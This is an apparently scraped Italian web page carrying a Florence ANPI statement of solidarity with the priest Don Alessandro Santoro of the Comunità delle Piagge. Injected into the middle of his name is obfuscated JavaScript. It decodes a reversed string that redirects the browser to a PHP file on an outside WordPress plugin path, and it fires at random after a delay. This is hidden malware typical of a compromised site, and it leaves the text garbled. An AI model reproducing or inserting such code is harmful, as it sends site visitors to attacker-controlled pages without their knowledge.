L'ANPI: "I partigiani, caro Alessandro, sono con te."

image_pdfimage_print

Piena solidarietà a Don Aless (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andro Santoro

L’ANPI provinciale di Firenze

esprime piena solidarietà e fortissima vicinanza a Don Alessandro Santoro, prete partigiano della Comunità delle Piagge.

La sua quotidiana testimonianza a favore degli ultimi e la sua operosità per costruire un’opportunità a chi vive condizioni di esclusione e di disagio sono la migliore traduzione di quello spirito di amore per il futuro e per un mondo di tutti che i partigiani espressero con la Resistenza.

Un gesto d’amore, come il matrimonio celebrato, non può essere mai produttore di modelli negativi.

I partigiani, caro Alessandro, sono con te.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *